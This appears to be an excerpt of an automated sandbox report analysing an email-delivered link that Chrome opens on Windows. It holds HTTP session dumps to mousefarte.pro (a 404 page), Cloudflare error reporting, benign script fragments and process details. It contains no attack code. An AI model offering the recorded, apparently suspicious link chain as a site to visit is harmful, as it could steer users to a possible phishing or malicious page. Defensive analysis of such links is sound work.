                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                        2024-10-02 15:15:46 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.460343188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:46 UTC669OUTGET /4pAtm/, HTTP/1.1
                                                                                        Host: mousefarte.pro
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
                                                                                        2024-10-02 15:15:47 UTC669INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvD%2FZBEWx7AcQfdA3TeMFJrt3IGhdWOw0cWSk2O9Qo93CSXDI22P9WOK6HGUPRsunxdfJz86I7Gko5BEz5moJ%2F6nDGx%2FgVTaBHATO43Iz5wiPsFJ%2F7GeGXPbWXILYl4IBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a65a9ca24391-EWR
                                                                                        2024-10-02 15:15:47 UTC700INData Raw: 34 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                                        Data Ascii: 4e0<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                                        2024-10-02 15:15:47 UTC555INData Raw: 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72
                                                                                        Data Ascii: </h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border
                                                                                        2024-10-02 15:15:47 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-02 15:15:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.46034935.190.80.14433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:16:21 UTC539OUTOPTIONS /report/v4?s=bvD%2FZBEWx7AcQfdA3TeMFJrt3IGhdWOw0cWSk2O9Qo93CSXDI22P9WOK6HGUPRsunxdfJz86I7Gko5BEz5moJ%2F6nDGx%2FgVTaBHATO43Iz5wiPsFJ%2F7GeGXPbWXILYl4IBA%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://mousefarte.pro
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:16:21 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Wed, 02 Oct 2024 15:16:20 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.46035035.190.80.14433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:16:21 UTC482OUTPOST /report/v4?s=bvD%2FZBEWx7AcQfdA3TeMFJrt3IGhdWOw0cWSk2O9Qo93CSXDI22P9WOK6HGUPRsunxdfJz86I7Gko5BEz5moJ%2F6nDGx%2FgVTaBHATO43Iz5wiPsFJ%2F7GeGXPbWXILYl4IBA%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 920
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:16:21 UTC920OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 35 30 36 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 38 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 75 73 65 66 61 72 74 65 2e 70 72 6f 2f 34 70 41 74 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22
                                                                                        Data Ascii: [{"age":35063,"body":{"elapsed_time":281,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type"
                                                                                        2024-10-02 15:16:21 UTC168INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        date: Wed, 02 Oct 2024 15:16:21 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:15:01
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:2
                                                                                        Start time:11:15:05
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2204,i,11409684658956308218,7678980179476139140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:3
                                                                                        Start time:11:15:08
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e"
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        No disassembly